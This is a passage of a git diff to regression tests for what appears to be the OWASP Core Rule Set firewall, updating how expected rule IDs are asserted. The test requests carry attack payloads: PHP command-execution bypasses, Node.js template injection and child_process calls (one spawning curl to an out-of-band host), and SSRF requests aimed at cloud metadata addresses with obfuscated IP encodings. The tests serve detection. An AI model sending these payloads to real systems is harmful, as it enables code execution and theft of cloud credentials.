"/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: @@ -228,7 +242,8 @@ tests: uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: @@ -243,7 +258,8 @@ tests: uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: @@ -259,7 +275,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933210" + log: + no_expect_ids: [933210] - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: @@ -275,7 +292,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933210" + log: + no_expect_ids: [933210] - test_id: 19 desc: Check FP if text contains quotes and round parenthesis stages: @@ -290,7 +308,8 @@ tests: uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" version: "HTTP/1.1" output: - no_log_contains: id "933210" + log: + no_expect_ids: [933210] - test_id: 20 desc: Block function call via string stages: @@ -305,7 +324,8 @@ tests: uri: "/get?code=%22system%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 21 desc: Block function call via string using hex escape sequence stages: @@ -320,4 +340,5 @@ tests: uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml index 0126b067f..5c7d7b8a4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 2 desc: Check for false positive 2 stages: @@ -33,7 +34,8 @@ tests: uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: @@ -78,7 +82,8 @@ tests: uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: @@ -93,7 +98,8 @@ tests: uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: @@ -123,7 +130,8 @@ tests: uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: @@ -138,7 +146,8 @@ tests: uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: @@ -153,7 +162,8 @@ tests: uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: @@ -168,7 +178,8 @@ tests: uri: "/get?x=%28system%29%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: @@ -183,7 +194,8 @@ tests: uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: @@ -198,7 +210,8 @@ tests: uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: @@ -213,7 +226,8 @@ tests: uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: @@ -228,7 +242,8 @@ tests: uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: @@ -243,7 +258,8 @@ tests: uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: @@ -259,7 +275,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: @@ -275,7 +292,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 19 desc: Block function call via string stages: @@ -290,7 +308,8 @@ tests: uri: "/get?code=%22system%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 20 desc: Block function call via string using hex escape sequence stages: @@ -305,7 +324,8 @@ tests: uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: @@ -320,4 +340,5 @@ tests: uri: "/get?code=(sy.(st).em)(%40id)" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index 691f428d0..17d72f457 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=_%24%24ND_FUNC%24%24_" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 2 desc: imported test stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=__js_function" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 3 desc: imported test stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=eval%28String.fromCharCode" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 4 desc: imported test stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=function%28%29+%7B" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 5 desc: imported test stages: @@ -78,7 +82,8 @@ tests: uri: "/get?foo=new+Function+%28" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 6 desc: imported test stages: @@ -93,7 +98,8 @@ tests: uri: "/get?foo=this.constructor.constructor" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 7 desc: imported test stages: @@ -108,7 +114,8 @@ tests: uri: "/get?foo=module.exports%3D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 8 desc: base64 encoded test stages: @@ -123,7 +130,8 @@ tests: uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 9 desc: base64 encoded test stages: @@ -138,7 +146,8 @@ tests: uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 10 desc: process.env test stages: @@ -153,7 +162,8 @@ tests: uri: "/get?foo=process.env" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 11 desc: console.info test stages: @@ -168,7 +178,8 @@ tests: uri: "/get?foo=console.info(1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: @@ -183,7 +194,8 @@ tests: uri: "/get?foo=c%5Cu006fnsole.info(1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 13 desc: process.env test (square bracket property access) stages: @@ -198,7 +210,8 @@ tests: uri: '/get?foo=process["env"]' version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 14 desc: console.info test (square bracket property access) stages: @@ -213,7 +226,8 @@ tests: uri: '/get?foo=console["info"](1)' version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 15 desc: console.info test (call method) stages: @@ -228,7 +242,8 @@ tests: uri: "/get?foo=console.info.call(this,1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 16 desc: '"process" false positive test' stages: @@ -243,7 +258,8 @@ tests: uri: "/get?foo=process." version: HTTP/1.0 output: - no_log_contains: id "934100" + log: + no_expect_ids: [934100] - test_id: 17 desc: '"console" false positive test' stages: @@ -258,7 +274,8 @@ tests: uri: "/get?foo=console." version: HTTP/1.0 output: - no_log_contains: id "934100" + log: + no_expect_ids: [934100] - test_id: 18 desc: ssti test 1 stages: @@ -273,7 +290,8 @@ tests: uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 19 desc: ssti test 2 stages: @@ -288,7 +306,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 20 desc: ssti test 3 stages: @@ -303,7 +322,8 @@ tests: uri: "/get?foo=process%5Breq.query.a" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 21 desc: ssti test 4 stages: @@ -318,7 +338,8 @@ tests: uri: "/get?foo=require%5Breq.query.a" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 22 desc: ssti test 5 stages: @@ -333,7 +354,8 @@ tests: uri: "/get?foo=process%5BmainModule" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 23 desc: require child_process stages: @@ -348,7 +370,8 @@ tests: uri: /get?foo=require("child_process").exec('whoami') version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 24 desc: "5ZLKNU33" stages: @@ -365,7 +388,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 25 desc: "5ZLKNU33" stages: @@ -382,7 +406,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 26 desc: "5ZLKNU33" stages: @@ -399,7 +424,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 25 desc: "5ZLKNU33" stages: @@ -415,7 +441,8 @@ tests: console.info(1) uri: /post output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 26 desc: "5ZLKNU33" stages: @@ -431,7 +458,8 @@ tests: console.info(1) uri: /post output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: @@ -447,7 +475,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -463,7 +492,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: @@ -479,7 +509,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: @@ -495,7 +526,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: @@ -511,4 +543,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index f49e6353d..7d152b405 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 2 desc: additional node ssti tests 2 stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 3 desc: additional node ssti tests 3 stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 4 desc: require child_process stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=require(\"child_process\").exec('whoami')" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 5 desc: require child_process spawn stages: @@ -78,7 +82,8 @@ tests: uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 6 desc: "Detect example payload require(... submitted as plaintext" stages: @@ -94,7 +99,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 7 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -110,7 +116,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: @@ -126,7 +133,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 9 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: @@ -142,7 +150,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: @@ -158,4 +167,5 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 7dc54e0c6..b71b664ce 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml @@ -20,7 +20,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 2 desc: SSRF - check digitalcloud url stages: @@ -37,7 +38,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 3 desc: SSRF - check packetcloud url stages: @@ -54,7 +56,8 @@ tests: uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 4 desc: SSRF - check openstack url stages: @@ -71,7 +74,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 5 desc: SSRF - check oracle cloud url stages: @@ -88,7 +92,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 6 desc: SSRF - negative test aws stages: @@ -105,7 +110,8 @@ tests: uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] - test_id: 7 desc: SSRF - negative test aws stages: @@ -122,7 +128,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] - test_id: 8 desc: SSRF - negative test gcp stages: @@ -139,4 +146,5 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index 76f57f20d..697f26b79 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml @@ -1,7 +1,6 @@ --- meta: author: "fzipitria, Max Leske, azurit" - description: "Description" rule_id: 934120 tests: - test_id: 1 @@ -20,7 +19,8 @@ tests: uri: "/get?ssrf=http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 2 desc: SSRF - IPv4, Dotless decimal with overflow stages: @@ -37,7 +37,8 @@ tests: uri: "/get?ssrf=http://7147006462/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 3 desc: SSRF - IPv4, Dotted hexadecimal stages: @@ -54,7 +55,8 @@ tests: uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 4 desc: SSRF - IPv4, Dotless hexadecimal stages: @@ -71,7 +73,8 @@ tests: uri: "/get?ssrf=http://0xA9FEA9FE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 5 desc: SSRF - IPv4, Dotless hexadecimal with overflow stages: @@ -88,7 +91,8 @@ tests: uri: "/get?ssrf=http://0x41414141A9FEA9FE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 6 desc: SSRF - IPv4, Dotted octal stages: @@ -105,7 +109,8 @@ tests: uri: "/get?ssrf=http://0251.0376.0251.0376/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 7 desc: SSRF - IPv4, Dotted octal with padding stages: @@ -122,7 +127,8 @@ tests: uri: "/get?ssrf=http://0251.00376.000251.0000376/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 8 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal stages: @@ -139,7 +145,8 @@ tests: uri: "/get?ssrf=http://169.254.43518/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 9 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal stages: @@ -156,7 +163,8 @@ tests: uri: "/get?ssrf=http://169.16689662/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 10 desc: SSRF - IPv6, first 10 bytes compressed stages: @@ -173,7 +181,8 @@ tests: uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 11 desc: SSRF - IPV6 Expanded stages: @@ -190,7 +199,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 12 desc: SSRF - IPV6 Expanded - Negative tests stages: @@ -207,7 +217,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 13 desc: SSRF - Dotless decimal - Negative tests stages: @@ -224,7 +235,8 @@ tests: uri: "/get?ssrf=2852039166" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 14 desc: SSRF - Dotless hexadecimal with overflow - Negative tests stages: @@ -241,7 +253,8 @@ tests: uri: "/get?ssrf=0x41414141A9FEA9FE" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 15 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal stages: @@ -258,7 +271,8 @@ tests: uri: "/get?ssrf=169.16689662" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 16 desc: SSRF - Negative tests - IPV6 Compressed stages: @@ -275,7 +289,8 @@ tests: uri: "/get?ssrf=[::ffff:a9fe:a9fe" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 17 desc: SSRF - Negative tests - IPV6 Compressed stages: @@ -292,7 +307,8 @@ tests: uri: "/get?ssrf=[::ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 18 desc: SSRF - Negative tests - IPV6 Expanded stages: @@ -309,7 +325,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 19 desc: SSRF - Negative tests - IPV6/IPV4 stages: @@ -326,7 +343,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 20 desc: SSRF - Evasion technique 1 stages: @@ -343,7 +361,8 @@ tests: uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 21 desc: SSRF - Weird protocol scheme 1 stages: @@ -360,7 +379,8 @@ tests: uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 22 desc: SSRF - Weird protocol scheme 2 stages: @@ -377,7 +397,8 @@ tests: uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 23 desc: SSRF - Enclosed alphanumerics 1 - digits stages: @@ -394,7 +415,8 @@ tests: uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 24 desc: SSRF - Enclosed alphanumerics 2 - digits stages: @@ -411,7 +433,8 @@ tests: uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 25 desc: SSRF - Enclosed alphanumerics 3 - text stages: @@ -428,7 +451,8 @@ tests: uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 26 desc: SSRF - Enclosed alphanumerics 3 - text stages: @@ -445,7 +469,8 @@ tests: uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 27 desc: SSRF - 8-Bit Octal conversion stages: @@ -462,7 +487,8 @@ tests: uri: "/get?ssrf=ssh://0177.00.00.01" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 28 desc: SSRF - 32-Bit Octal conversion stages: @@ -479,7 +505,8 @@ tests: uri: "/get?ssrf=rtmp://017700000001" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 29 desc: SSRF - 32-Bit Hex conversion stages: @@ -496,7 +523,8 @@ tests: uri: "/get?ssrf=gopher://0x7f000001" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 30 desc: SSRF - IPv6, first byte full, rest compressed stages: @@ -513,7 +541,8 @@ tests: uri: "/get?ssrf=http://[a::]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: @@ -530,7 +559,8 @@ tests: uri: "/get?ssrf=http://[a::b]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: @@ -547,7 +577,8 @@ tests: uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 33 desc: SSRF - IPv6, link-local unicast with zone ID, compressed stages: @@ -564,7 +595,8 @@ tests: uri: "/get?ssrf=http://[fe80::%zone1]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: @@ -581,7 +613,8 @@ tests: uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 35 desc: SSRF - IPv6, IPv4 mapped stages: @@ -598,7 +631,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: @@ -615,7 +649,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - 